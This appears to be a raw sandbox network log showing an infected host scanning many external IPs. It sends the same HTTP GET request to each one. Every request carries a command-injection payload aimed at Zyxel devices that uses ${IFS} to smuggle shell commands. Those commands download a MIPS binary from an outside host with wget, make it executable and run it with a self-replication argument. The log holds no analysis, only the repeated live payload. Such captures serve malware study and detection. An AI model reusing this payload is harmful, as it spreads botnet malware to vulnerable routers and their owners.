                                          Jan 14, 2024 15:46:31.330507040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7935192.168.2.2333908122.166.17.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330526114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7936192.168.2.2354626186.152.47.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330573082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7937192.168.2.2353328202.206.7.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330576897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7938192.168.2.2353248222.85.48.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330599070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7939192.168.2.2360526148.1.14.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330661058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7940192.168.2.23412861.235.99.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330691099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7941192.168.2.2334940207.105.255.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330723047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7942192.168.2.233707835.153.53.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330749035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7943192.168.2.2337428135.0.191.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330800056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7944192.168.2.2349406191.191.112.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330831051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7945192.168.2.235903640.162.182.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330847979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7946192.168.2.2350190156.111.211.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330868959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7947192.168.2.2334174221.153.167.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330907106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7948192.168.2.234303060.146.120.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330951929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7949192.168.2.2352434131.56.121.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330972910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7950192.168.2.2338556218.197.45.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.330997944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7951192.168.2.235658478.38.177.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331008911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7952192.168.2.2358268192.58.151.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331044912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7953192.168.2.2360304137.218.78.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331044912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7954192.168.2.23514825.167.194.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331083059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7955192.168.2.2352046115.51.100.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331105947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7956192.168.2.2358440209.182.98.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331114054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7957192.168.2.234218676.12.127.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331170082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7958192.168.2.2341130113.204.236.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331185102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7959192.168.2.2348220118.188.207.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331216097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7960192.168.2.2346544142.136.54.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331224918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7961192.168.2.2338992161.133.15.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331278086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7962192.168.2.234909670.116.186.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331309080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7963192.168.2.234766647.52.39.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331336975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7964192.168.2.235862884.195.126.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331350088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7965192.168.2.235220870.228.104.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331372976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7966192.168.2.2336634157.182.21.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331408978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7967192.168.2.234298217.206.223.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331446886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7968192.168.2.2339934210.220.220.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331492901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7969192.168.2.2344610177.178.165.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331511974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7970192.168.2.2349752167.91.54.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331573009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7971192.168.2.234756641.5.118.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331585884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7972192.168.2.2334724154.240.89.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331605911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7973192.168.2.2351486140.114.78.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331671000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7974192.168.2.233959440.20.101.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331674099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7975192.168.2.2335288172.87.205.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331718922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7976192.168.2.2351996202.248.3.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331723928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7977192.168.2.2351900112.215.53.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331770897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7978192.168.2.2340886211.179.92.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331794977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7979192.168.2.2352600222.199.30.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331834078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7980192.168.2.235784442.38.132.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331870079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7981192.168.2.2350080140.109.144.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331897020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7982192.168.2.233488248.152.201.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331928015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7983192.168.2.2350666182.234.43.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331969023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7984192.168.2.234862857.5.153.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331988096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7985192.168.2.234871473.175.24.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.331999063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7986192.168.2.23517948.196.99.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332022905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7987192.168.2.2350288194.203.85.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332062006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7988192.168.2.233938267.51.170.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332087040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7989192.168.2.2356948202.161.77.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332119942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7990192.168.2.234397083.172.244.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332132101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7991192.168.2.2333624206.22.40.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332158089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7992192.168.2.233464025.82.71.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332181931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7993192.168.2.2333402173.108.187.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332190037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7994192.168.2.2333572130.184.121.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332226038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7995192.168.2.2358822120.178.221.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332258940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7996192.168.2.2344054118.163.168.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.332281113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7997192.168.2.2349350106.231.222.65443
                                          TimestampBytes transferredDirectionData
